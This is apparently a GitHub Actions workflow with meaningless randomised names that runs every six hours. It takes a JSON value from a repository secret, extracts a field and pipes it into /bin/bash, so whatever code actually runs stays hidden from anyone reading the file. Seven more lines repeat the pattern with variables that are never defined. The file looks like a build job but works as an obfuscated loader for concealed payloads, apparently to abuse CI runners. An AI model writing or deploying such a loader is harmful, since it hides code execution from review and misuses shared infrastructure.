name: meibaodi4317
on:
  workflow_dispatch:
  schedule:
    - cron: '12 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: meibaodi4317
        env:
          x778: ${{ secrets.x778 }}
        run: |
          echo $x778 | jq -r .glon44978 | /bin/bash
          echo $aiayl49 | jq -r .faq00 | /bin/bash
          echo $mua1 | jq -r .wjd57 | /bin/bash
          echo $spfj9411 | jq -r .kogrn320 | /bin/bash
          echo $bsphc5090 | jq -r .xhoc37420 | /bin/bash
          echo $cp25 | jq -r .yliu313 | /bin/bash
          echo $bqpa22707 | jq -r .ltul2415 | /bin/bash
          echo $qjz42441 | jq -r .vqdn74129 | /bin/bash

